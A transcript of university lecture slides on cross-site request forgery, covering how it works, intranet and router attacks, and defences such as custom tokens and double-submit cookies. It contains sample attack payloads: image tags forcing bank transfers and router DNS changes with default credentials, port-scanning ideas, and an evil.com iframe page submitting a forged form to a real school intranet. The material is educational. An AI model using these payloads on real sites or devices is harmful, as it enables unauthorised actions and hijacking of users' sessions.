cross site request forgery - csrf - benoist · cross site request forgery not a new attack, but...
TRANSCRIPT
Cross Site RequestForgery - CSRF
Emmanuel BenoistFall Term 2019/2020
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 1
Table of Contents� Cross Site Request Forgery
Widespead vulnerabilityVulnerability?
� Attacks using CSRFMeans to reach victimsIntranet as natural victimCombination XSS and CSRF
� Examples of attackAttack: intranet from inside
� Protection that does not workAccepting POST only
� ProtectionCustom tockenCSRF prevention without a synchronizer token
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 2
Cross Site Request Forgery
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 3
Cross Site Request Forgery
Not a new attack, but simple and devastating
CSRF attack forces a logged-on victim’s browser to senda request to a vulnerable web application
Target: Perform the chosen action on behalf of thevictim
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 4
Sending a request without theconsent of the victim?
Insert an image in a HTML file
<img src="http://www.benoist.ch/image/test.gif">
Browser: Downloads an image
GET /image/test.gif HTTP/1.1
...
An image can be generated by a PHP program (or anyprogram)
<img src="http://www.benoist.ch/image/test.php">
Browser: Downloads an image
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 5
Sending a request? (Cont.)
An image can be generated according to someparameters
<img src="/barcode.php?number=12345678901">
Browser: Downloads an image
An image tag can contain something else
<img src="http://www.benoist.ch/index.php?action↘
→=logout">
Browser ?????
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 6
Widespead vulnerability
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 7
Widespread vulnerabilityTouches any web application that
has no authorization checks for vulnerable actions
will process an action if a default login is able to begiven in the request
<img src=
"http://www.benoist.ch/doSomething?user=admin&pwd=↘
→admin">
Authorizes requests based only on credentials that areautomatically submitted
cookies if currently logged into the applicationor “Remember me” functionality if not logged into theapplicationor a Kerberos token if part of an Intranet participating inintegrated logon with Active Directory.
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 8
State of the art
Most of web applications rely solely on automaticallysubmitted credentials
cookiesbasic authentication credentialssource IP addressesSSL certificatesor windows domain credentials
Vulnerability also known asSession Riding, One-Click Attacks, Cross Site ReferenceForgery, Hostile Linking, and Automation AttackAcronym XSRF is also used together with CSRF
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 9
Vulnerability?
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 10
VulnerabilityA typical CSRF attack directs the user to invoke somefunction
for instance application’s logout page
The following tag can be inserted in any page viewed bythe victim
<img src="http://www.benoist.ch/logout.php">
it generates the same request as clicking on a link containingthis address!
Example: Online banking transfer
<img src="http://www.mybank.de/transfer.do?
fromAccount=document.form.frmAcct&
toAccount=4567890&amount=3434.43">
Could transfer the money from the account of the user, to agiven account.
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 11
Attacks using CSRF
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 12
Means to reach victims
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 13
How such a link could reach a victim
Web-site Owner embedded JavaScript malware
Web page defaced with embedded JavaScript malware
JavaScript Malware injected into a public area of awebsite. (persistent XSS)
Clicked on, a specially-crafted link causing the websiteto echo JavaScript malware. (non-persistent XSS)
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 14
Intranet as natural victim
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 15
CSRF allows to access the intranet
The attacker sends requests from inside the IntranetDoesn’t have to go throw the firewall, the victim is already
CSRF combined with javascript allows to send manyrequests sequentially
javascript adds an image in the DOM (possibly invisible).when the request is sent, another image is addedand so on
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 16
Internet is protected, but Intranet?
You would never dare doing this on Internet! But whatabout Intranet?
Leaving hosts unpatchedServers are always patched regularly, but local PC’s?
Using default passwordsWhat the use of changing the password, the IP address canonly be reached from inside my network192.168.x.y
Do not putting a firewall in front of a host
Everything seams OK because the perimeter firewallsblack external access
So CSRF attacks can be very fruitful
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 17
Why do CSRF attacks work?
User authorization credential is automatically included inany request by the browse
Typical: Session Cookie
The Attacker doesn’t need to supply that credentialIt belongs to the victim’s browser
Success of CSRF belongs on the probability that thevictim is logged in the attacked system
Idea: attack the site the victim visitsMean : XSS
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 18
Combination XSS and CSRF
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 19
CSRF and XSS
Combine CSRF and XSSThe tag is already posted inside the vulnerable application
Risk is increased by that combinationProbability to find a logged in user is higher
CSRF does not require XSSOne can attack a site from another one
Any application with XSS flaws is susceptible to CSRFCSRF attacks can exploit the XSS flaw to steal anynon-automatically submitted credential
When building defenses against CSRF attacks, you musteliminate XSS vulnerabilities
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 20
Examples of attack
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 21
Attack: intranet from inside
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 22
Vulnerability (Cont.)
Jeremiah Grossman1 Succeeded in making changes invictims DSL routers
Even if the user doesn’t know that he can configure hisrouter ;-)
He used the router’s default account name to performhis attack Example
<img src="http://admin:[email protected]/">
Then you just have to reconfigure the system
<img src="http://192.168.1.1/changeDNS?newDNS↘
→=143.23.45.1">
Once DNS changed, user will never be able to access asite securely!
1Talk in Blackhat 2006 : “Hacking Intranet Sites from the outside”Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 23
Details of attack2
Javascript Port Scaning<script src="http://192.168.1.100/"></script>
If a web server is listening: HTML will be returned, causing aJS interpreter error:Solution: Capture the Error!(<script ... onerror="myfunction()">)
Javascript can loop on all the possible IP addresses fornearby hosts:
Scanning of the hosts
2Hacking Intranet Sites from the outside, Jeremiah GrossmanBerner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 24
Details of attack (Cont.)
Recognize the server?Use a URL that is unique for each serverApache Web Server: /icons/apache_pb.gif
HP Printer: /hp/device/hp_invent_logo.gif
PHP Image Easter eggs:/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
Cycle through unique URL’s using Image DOM objects
<img src="http://192.168.1.100/unique_image_url"
onerror="fingerprint()" />
If onerror event DOES NOT execute, then it’s the associatedplatform!
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 25
Details of attack (Cont.)Login
If already authenticated: nothing to do, access is automaticif not: http://admin:[email protected]/
Execute commandSuppose we have the following POST form
<form action="changePwd.php" method="POST">
new password <input type="password" name="newpwd"↘
→>
retype new password <input type="password" name="↘
→newpwd2">
<input type="submit" value="send">
</form>
We can forge a URL (GET) faking this POST form
<img src="changePwd.php?newpwd=Toto&newpwd2=Toto↘
→">
It is also possible to generate a POST using JavaScriptBerner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 26
Possible targets in a LAN (Intranet)
Web enabled devices:Printer, webcam, Phone over IP, WLan access points, switch,ADSL router, etc.
Attack on routerChange config passwordUpdate DNS=> Man in the middle attack
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 27
Protection that does not work
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 28
Accepting POST only
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 29
Solution: Only accept POST requests
Since GET requests are easy to generateRequires only a <img> or <script> tagGenerates a valide GET requestCan contain all the required parameters
Idea: block any GET requestAccept only POST requestsEasy tags do not work anymore
DOES NOT WORK!
POST requests can be generatedContain also automatic credentialsProtection is useless!
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 30
Attack a page using a POST form
We want to provide a Logout for the school intranet web site
The logout is done using a form.The button on the form sends a POST request
Source of https://intranet.ti.bfh.ch/index.php?id=4117&L=1
<form action="index.php?id=4117&L=1" target="_top" method="post" style="margin: 0 0 0 0;">
<table border="0">
<tr>
<td><p class="tx-newloginbox-pi1-username">Nom d utilisateur:</p></td>
<td><p><strong>bie1</strong>, Benoist</p></td>
</tr>
<tr>
<td></td>
<td><input type="submit" name="submit"
id="tx-newloginbox-pi1-logout_submit"
value="Deconnexion"
class="tx-newloginbox-pi1-submit" />
<input type="hidden" name="logintype" value="logout" />
<input type="hidden" name="pid" value="4119" />
</td>
</tr>
</table>
</form>
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 31
Principles of the attack
The user visits another pagesuppose it is www.evil.com/mypage.html
It can be any page on the web
The page contains an invisible iFrame
The content can not be viewedThe iFrame contains a page on the web site evil.com
The javascript on mypage.html can communicate withthe iFrame
They are from the same site: same origine policy applies
The iFrame contains the same login form as the schoollogout page
JavaScript forces the iFrame to submit the form to the schoolsite.
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 32
The main page
Source for www.evil.com/mypage.html 3
<h2>Logout out of the intranet of the School</h2>
<iframe id="testIFrameLogout" src="iFrameLogout.html↘
→"></iframe>
<br />
<button onclick="document.getElementById(’↘
→testIFrameLogout’).contentWindow.submitForm()">
Submit form
</button>
3In a real example, the submitForm() is executed automaticallyBerner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 33
iFrame contentSource for www.evil.com/iFrameLogout.html
<h1>Test For Logout</h1>
<form id="foo"
action="https://intranet.ti.bfh.ch/index.php?id=4117↘
→" method="POST">
<input type="submit" name="submit2"
id="tx-newloginbox-pi1-logout_submit"
value="Deconnexion" class="tx-newloginbox↘
→-pi1-submit" />
<input type="hidden" name="logintype" value="↘
→logout" />
<input type="hidden" name="pid" value="4119" />
</form>
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 34
Protection
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 35
Custom tocken
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 36
Protection
Application must ensure that they are not only relyingon credentials or tokens that are automaticallysubmitted by browsers
Session CookiesCertificatesRemember me. . .
Application should use a custom token that the browserwill not “Remember”
So it can not be included in the Requests sent automatically
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 37
StrategiesEnsure that there are no XSS vulnerabilities in yourapplication
Otherwise, any protection is useless, since javascript couldaccess the hidden data.
Insert custom random tokens into every form and URLIt will not be automatically submitted by the browserExample:
<form action="/transfer.do" method="POST">
<input type="hidden" name="383838" value="↘
→1234323433">
...
</form>
Then you have to verify that tokenToken can be unique for a session or even for each pageThe more focused the token is, the higher the security is, butthe application is then much more complicated to write
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 38
Strategies (Cont.)
For sensitive data or value transactions, re-authenticateor use transaction signing
to ensure that the request is genuine.Set up external mechanism to verify requests (phone, e-mail)Notify the user of the request using an e-mail
Do not use GET requests for sensitive data or toperform value transactions
Use only POST methods when processing sensitive data fromthe user.However the URL may contain the random token as thiscreates a unique URL, which makes CSRF almost impossibleto perform
POST alone is an insufficient protectionYou must also combine it with random tokens
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 39
Protect your token
Disclosure of Token in URLIf you include token in GET requests (i.e. URL)It mitigates the risk of CSRF attacksBut the unique per session token is exposed
Exposition of URL’sBrowser historyHTTP log filesnetwork appliance loging the first line of HTTP requestsURL-Referer is transfered to third parties
Third party knowing the tokenCSRF is trivial to be launchedCan target the attack effectively (referer tells the user isvisiting the site)Can run entirely in JavaScriptJust need a JavaScript call in the page.
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 40
Protect your token (Cont.)
PreventionReferer is omitted if origin of the request is HTTPSSolution: make web site HTTPS onlyOr use only POST methods for sensitive actionsDo not include CSRF token in GET requests
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 41
Double Submit Cookies
Send a random value in both cookie and requestparameter
The value is stored as a cookieIt is included as hidden parameter in all formsNo need to store the value on the server
Server verifies: cookie = received value in form
The attackerCan modify the form parameterCan neither read nor modify the cookie
Attacker can not submit both elements at the same time
Solution adopted by Java Library Direct Web Remoting(DWR)
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 42
Encrypted token patternServer generates a token
Placed in all forms as a hidden fieldNot stored on the server
Token containsUser’s IDtimestampnonceEncrypt the information with a symetric key (only known bythe server)
Token is included in all the requestsAJAX requests will send the information in the URLNon AJAX requests will include information as a hidden field
On receipt of the tokenServer checks the values stored in the tokenUser’s IDtimestamp (agains replay attacks).
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 43
CSRF prevention without asynchronizer token
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 44
Checking the referer headerTrivial to spoof referer header
But only on your own browserimpossible to do so in a CSRF attackSolution commonly used with unauthenticated requests (beforelogin)
Weak protection against CSRFOpen redirect vulnerabilities can be used to exploit GET-basedrequestsSome organisations (or browsers) may remove Referer fromrequests (privacy protection).
Common implementation mistakesIf attacks originates from an https server: Referer is omittedLack of referer : marks an attack (at least of state changingfunctions)
Referer could be lightly manipulatedIf victim site is site.com
Attacker could send requests from site.com.attacker.com
Could fool easy testings
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 45
Challenge-Response
CaptchaGenerate an imageVerify that a human sees the image and interprets itCan not be automatic in CSRF
Re-Authentication (password)Necessary for very sensitive actionsChange password for instanceVery user-unfriendly
One-time tokenToken is changed with each request
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 46
Mitigating risks from the user’s pointof view
Logoff immediately after using a Web application
Do not allow browser to save username/passwords
Do not use the same browser to access sensitiveapplications and to surf the internet
Tabbed browsing
Plugins like “No-Script” makes POST based CSRFdifficult to exploit
JavaScript is used to automatically submit the form when theexploit is loadedWithout JavaScript, the attacker must trick the user to do somanually
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 47
Conclusion
Cross Site Request Forgery - CSRFExploits the trust the site has in a userby forging the enactor and making a request appear to comefrom a trusted user4
The server receives some requests from the user and think itwas sent on prupose.
4wikipediaBerner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 48
ReferencesOWASP Top 10 - 2010http://www.owasp.org/index.php/Category:
OWASP_Top_Ten_Project
A Guide for Building Secure Web Applications and WebServiceshttp://www.owasp.org/index.php/Category:
OWASP_Guide_Project
Hacking Intranet Sites from the outside, JeremiahGrossman, BlackHat 2006http://www.whitehatsec.com/presentations/
whitehat_bh_pres_08032006.tar.gz
RSnake, “What is CSRF?”http://ha.ckers.org/blog/20061030/what-is-csrf/
OWASP CSRF Prevention Cheat Sheethttps://www.owasp.org/index.php/Cross-Site_
Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences 49